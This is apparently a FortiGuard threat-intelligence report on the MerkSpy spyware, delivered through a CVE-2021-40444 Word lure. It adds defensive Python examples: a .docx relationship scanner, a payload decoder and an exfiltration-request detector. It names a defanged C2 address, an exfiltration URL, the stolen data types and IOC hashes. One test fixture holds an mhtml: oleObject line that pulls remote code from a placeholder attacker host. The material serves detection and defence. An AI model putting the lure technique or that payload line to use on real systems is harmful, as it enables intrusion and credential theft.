Affected Platforms: Microsoft Windows
Impacted Users: Microsoft Windows
Impact: The stolen information can be used for future attacks
Severity Level: High
Spyware is malicious software engineered to covertly monitor and gather information from a user’s computer without their awareness or consent. It can record activities like keystrokes, browsing behavior, and personal information, often transmitting this data to a third party for espionage or theft.
FortiGuard Labs recently detected an attack exploiting the CVE-2021-40444 vulnerability in Microsoft Office. This flaw allows attackers to execute malicious code via specially crafted documents. In this instance, the exploitation led to the deployment of a spyware payload known as “MerkSpy.” MerkSpy is designed to clandestinely monitor user activities, capture sensitive information, and establish persistence on compromised systems.
This blog will dissect the stages of this complex attack, offering insights into the techniques used by cybercriminals to infiltrate systems and steal sensitive data.
The initial vector for this attack is a deceptive Microsoft Word document posing as a job description for a software developer position.
Opening the document triggers the exploitation of CVE-2021-40444, a remote code execution vulnerability within the MSHTML component used by Internet Explorer in Microsoft Office. This vulnerability permits an attacker to execute arbitrary code on a victim’s machine without additional user interaction beyond opening the document. The attacker conceals the URL within the “_rels\document.xml” file. It directs to hxxp://45[.]89[.]53[.]46/google/olerender[.]html, downloading an HTML file that sets the stage for the next phase of the attack.
Figure 3: _rels\document.xml
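The relationship file is where a defender can look before the document is ever opened. The following is an added example, not code from the FortiGuard report: it opens a .docx as the ZIP container it is, reads the standard OOXML relationships part `word/_rels/document.xml.rels` (the path assumed here for the “_rels\document.xml” file named above), and lists every relationship that is marked External or whose target is an http(s) or mhtml: URL. The sample document and the `attacker.example` host are constructed placeholders, not the real indicators.

```python
import io
import re
import zipfile
from xml.etree import ElementTree as ET

# Standard OOXML package-relationships namespace and the part that
# word/document.xml uses to reference embedded objects and external targets.
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
DOCUMENT_RELS = "word/_rels/document.xml.rels"

# A job-description document has no reason to reference an http(s) target or
# the mhtml: scheme; either is worth a closer look.
SUSPICIOUS_TARGET = re.compile(r"^(?:mhtml:|https?://)", re.IGNORECASE)


def find_external_relationships(docx_bytes: bytes) -> list:
    """Return each relationship in word/_rels/document.xml.rels that is
    External or points at an http(s)/mhtml URL."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if DOCUMENT_RELS not in zf.namelist():
            return findings
        root = ET.fromstring(zf.read(DOCUMENT_RELS))
    for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
        target = rel.get("Target", "")
        mode = rel.get("TargetMode", "Internal")
        if mode == "External" or SUSPICIOUS_TARGET.search(target):
            findings.append({
                "id": rel.get("Id"),
                "type": rel.get("Type", "").rsplit("/", 1)[-1],
                "target": target,
                "mode": mode,
            })
    return findings


def build_sample_docx(rels_xml: str) -> bytes:
    """Constructed minimal .docx containing only the parts the scanner reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr(DOCUMENT_RELS, rels_xml)
    return buf.getvalue()


# Constructed relationships: one benign image plus an oleObject whose target
# is an external mhtml: URL on a placeholder host (not the real C2 address).
SAMPLE_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/>
  <Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://attacker.example/google/olerender.html!x-usc:http://attacker.example/google/olerender.html" TargetMode="External"/>
</Relationships>
"""

if __name__ == "__main__":
    for hit in find_external_relationships(build_sample_docx(SAMPLE_RELS)):
        print(f"[!] {hit['id']} {hit['type']} -> {hit['target']}")
```

Run it over a mail-gateway quarantine or a sample set and any oleObject relationship with an External target stands out immediately; a legitimate document almost always references `embeddings/oleObject1.bin` inside the package instead.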
After the successful exploitation, the malicious document initiates the downloaded payload, “olerender.html,” from a remote server. This HTML file is strategically crafted, with innocuous script filling the beginning to mask its true intent. The end of the file conceals the shellcode and injection process, which propels the attack forward when executed on the victim’s machine.
Figure 5: Code at the end of olerender.html
“olerender.html” first checks the system’s OS version. If it detects an X64 architecture, it extracts the embedded “sc_x64” shellcode.
After determining the OS version and extracting the appropriate shellcode, “olerender.html” locates and retrieves the Windows APIs “VirtualProtect” and “CreateThread.” These functions are crucial for the following steps: it uses “VirtualProtect” to change the permissions of the target memory region so the decoded shellcode can be written there and executed. It then calls “CreateThread” to run the injected shellcode, setting the stage for downloading and executing the next payload from the attacker’s server. This sequence lets the malicious code run without interruption, facilitating further exploitation.
Figure 7: Retrieving the Windows APIs
Figure 8: Decoding the shellcode via XOR
Figure 9: Writing and invoking the shellcode
Once the shellcode is in place, it functions as a downloader, initiating the next phase of the attack. It reaches out to the same remote server to fetch a file, deceptively named “GoogleUpdate.” Despite its seemingly innocuous name, “GoogleUpdate” is far from benign. This file harbors the core malicious payload, which is deeply encoded to evade detection by standard security measures. Upon successful download, the shellcode meticulously decodes and prepares this payload for execution.
Figure 10: Downloaded "GoogleUpdate"
Once “GoogleUpdate” is downloaded, the shellcode decodes the file using an XOR key of 0x25021420 and an increment value of 0x00890518. This decoding step is crucial because it recovers the actual payload concealed within the file. By keeping the payload in this encoded form until the moment of use, the shellcode ensures that the malicious content stays hidden from static inspection, allowing the attacker to execute their intended operations on the compromised system effectively.
Figure 11: XOR-decoded file and its payload injection
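For an analyst who has the downloaded “GoogleUpdate” file but not a running shellcode, a reimplementation of the decoder is the quickest way to recover the payload. The block below is an added example, not code from the report. It assumes a scheme the report does not spell out: the 32-bit key is XORed against each little-endian dword of the file, then incremented by the stated value modulo 2^32, with a trailing partial dword XORed against only as many key bytes as remain. Because XOR is its own inverse the same routine encodes and decodes, which the round trip on a constructed stand-in for a PE header demonstrates; `looks_like_pe` is the sanity check an analyst would run on the output.

```python
import struct

# Values reported in the analysis of the shellcode's decoding routine.
XOR_KEY = 0x25021420
KEY_INCREMENT = 0x00890518
MASK32 = 0xFFFFFFFF


def rolling_xor(data: bytes, key: int = XOR_KEY, inc: int = KEY_INCREMENT) -> bytes:
    """XOR each little-endian dword with the current key, then step the key.

    Assumption (not stated in the analysis): per-dword little-endian key,
    key += inc modulo 2**32 after each dword, partial tail handled bytewise.
    XOR is its own inverse, so calling this twice restores the input.
    """
    out = bytearray()
    for off in range(0, len(data), 4):
        chunk = data[off:off + 4]
        keystream = struct.pack("<I", key & MASK32)[:len(chunk)]
        out += bytes(a ^ b for a, b in zip(chunk, keystream))
        key = (key + inc) & MASK32
    return bytes(out)


def looks_like_pe(data: bytes) -> bool:
    """Cheap sanity check on a decoded blob: 'MZ' at offset 0 and 'PE\\0\\0'
    at the offset stored in the DOS header's e_lfanew field (offset 0x3C)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def fake_pe_header() -> bytes:
    """Constructed stand-in for the decoded payload: a 64-byte DOS header whose
    e_lfanew points at an immediately following PE signature."""
    hdr = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    return bytes(hdr) + b"PE\0\0" + b"\0" * 20


if __name__ == "__main__":
    encoded = rolling_xor(fake_pe_header())   # simulates the on-disk "GoogleUpdate"
    print("encoded blob looks like a PE:", looks_like_pe(encoded))   # False
    decoded = rolling_xor(encoded)
    print("decoded blob looks like a PE:", looks_like_pe(decoded))   # True
```

If a real sample does not decode to an `MZ` header under this scheme, the assumptions to revisit first are the dword width, the byte order of the key, and whether the key is incremented before or after the first XOR; the two constants from the report are the only fixed points.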
The extracted payload is protected with VMProtect. Its primary function is seamlessly injecting the MerkSpy spyware into crucial system processes. MerkSpy spyware operates covertly within a system, enabling it to capture sensitive information, monitor user activities, and exfiltrate data to remote servers controlled by malicious actors.
Figure 12: A file's information shown using the DIE (Detect It Easy) tool
MerkSpy achieves persistence by masquerading as “Google Update,” adding a registry entry for “GoogleUpdate.exe” in “Software\Microsoft\Windows\CurrentVersion\Run.” This deceptive tactic ensures that MerkSpy launches automatically at system startup, enabling continuous operation and data exfiltration without the user’s knowledge or consent.
Figure 13: Creating a registry entry
Following its installation, MerkSpy initiates the exfiltration process and begins monitoring specific targets: capturing screenshots, logging keystrokes, retrieving Chrome login credentials, and accessing the MetaMask extension. Once it gathers this data, MerkSpy uploads the collected information to the attacker’s server through the URL hxxp://45[.]89[.]53[.]46/google/update[.]php.
Figure 14: Switch cases of monitoring a compromised endpoint
The POST request employs a user agent string of “WINDOWS” and uses a fixed boundary, “---------------------------update request,” indicating it is a multi-part form-data submission. The request body consists of multiple parts:
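The two fixed strings in that request, the literal “WINDOWS” user agent and the hard-coded multipart boundary, are what a proxy or IDS can key on. The block below is an added example, not from the report: a small HTTP/1.x request-head parser plus a scorer that reports which of the three indicators (user agent, boundary, `/google/update.php` path) a POST matches. Both sample requests are constructed; the hosts are placeholders, and the benign one uses a browser-style boundary to show the scorer does not fire on ordinary form uploads.

```python
from typing import Dict, List, Optional

# Indicators from the analysis of the exfiltration request.
EXFIL_USER_AGENT = "WINDOWS"
EXFIL_BOUNDARY = "---------------------------update request"
EXFIL_PATH = "/google/update.php"


def parse_request_head(raw: bytes) -> Optional[Dict[str, str]]:
    """Parse the request line and headers of a raw HTTP/1.x request into a
    dict (header names lower-cased). Returns None if the head is malformed."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        return None
    req = {"method": parts[0], "path": parts[1], "version": parts[2]}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            return None
        req[name.strip().lower()] = value.strip()
    return req


def boundary_of(content_type: str) -> Optional[str]:
    """Extract the boundary parameter from a multipart/form-data Content-Type."""
    ctype, _, params = content_type.partition(";")
    if ctype.strip().lower() != "multipart/form-data":
        return None
    for param in params.split(";"):
        key, _, val = param.strip().partition("=")
        if key.lower() == "boundary":
            return val.strip('"')
    return None


def score_request(raw: bytes) -> List[str]:
    """Return the indicators a POST request matches; an empty list is benign."""
    req = parse_request_head(raw)
    if req is None or req["method"] != "POST":
        return []
    hits = []
    if req.get("user-agent") == EXFIL_USER_AGENT:
        hits.append("user-agent")
    if boundary_of(req.get("content-type", "")) == EXFIL_BOUNDARY:
        hits.append("boundary")
    if req["path"] == EXFIL_PATH:
        hits.append("path")
    return hits


# Constructed samples: the first mimics the described exfiltration request
# (placeholder host), the second is an ordinary browser form upload.
MALICIOUS_REQUEST = (
    b"POST /google/update.php HTTP/1.1\r\n"
    b"Host: c2.example\r\n"
    b"User-Agent: WINDOWS\r\n"
    b"Content-Type: multipart/form-data; boundary=---------------------------update request\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)
BENIGN_REQUEST = (
    b"POST /upload HTTP/1.1\r\n"
    b"Host: files.example\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
    b"Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    for label, raw in (("malicious", MALICIOUS_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, "->", score_request(raw) or "no indicators")
```

The boundary alone is the strongest of the three signals: browsers and HTTP libraries generate random boundaries per request, so a constant one across many uploads from one host is unusual even before the user agent or path is considered.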
Based on telemetry from the C2 server at “45[.]89[.]53[.]46,” a significant activity spike began at the end of May, primarily targeting North America and India.
The initial phase of the attack leverages a vulnerability in the MSHTML component used by Internet Explorer. Upon exploitation, it initiates the download of a file named “olerender.html,” which contains JavaScript and embedded shellcode. This shellcode decodes the downloaded content to execute an injector responsible for loading the MerkSpy spyware into memory and integrating it with active system processes. MerkSpy is capable of sophisticated surveillance activities, including keystroke logging, screenshot capture, and harvesting Chrome browser login data. By understanding the intricacies of this attack chain, organizations can enhance their readiness and deploy effective defenses against such intrusions. FortiGuard Labs remains vigilant in monitoring these threats and offers ongoing intelligence to safeguard our users.
The malware described in this report is detected and blocked by FortiGuard Antivirus as:
MSOffice/Agent.AN!tr
HTML/Agent.SC!tr
Data/Agent.C1FT!tr
W64/Injector.SRQ!tr
FortiGate, FortiMail, FortiClient, and FortiEDR support the FortiGuard AntiVirus service. The FortiGuard AntiVirus engine is part of each of these solutions. As a result, customers who have these products with up-to-date protections are protected.
The FortiGuard CDR (content disarm and reconstruction) service, which runs on both FortiGate and FortiMail, can disarm the malicious macros in the document.
We also suggest that organizations go through Fortinet’s free NSE training module: NSE 1 – Information Security Awareness. This module is designed to help end users learn how to identify and protect themselves from phishing attacks.
FortiGuard IP Reputation and Anti-Botnet Security Service proactively blocks these attacks by aggregating malicious source IP data from the Fortinet distributed network of threat sensors, CERTs, MITRE, cooperative competitors, and other global sources that collaborate to provide up-to-date threat intelligence about hostile sources.
If you believe this or any other cybersecurity threat has impacted your organization, please contact our Global FortiGuard Incident Response Team.
45[.]89[.]53[.]46
92eb60179d1cf265a9e2094c9a54e025597101b8a78e2a57c19e4681df465e08
95a3380f322f352cf7370c5af47f20b26238d96c3ad57b6bc972776cc294389a
0ffadb53f9624950dea0e07fcffcc31404299230735746ca43d4db05e4d708c6
dd369262074466ce937b52c0acd75abad112e395f353072ae11e3e888ac132a8
569f6cd88806d9db9e92a579dea7a9241352d900f53ff7fe241b0006ba3f0e22
6cdc2355cf07a240e78459dd4dd32e26210e22bf5e4a15ea08a984a5d9241067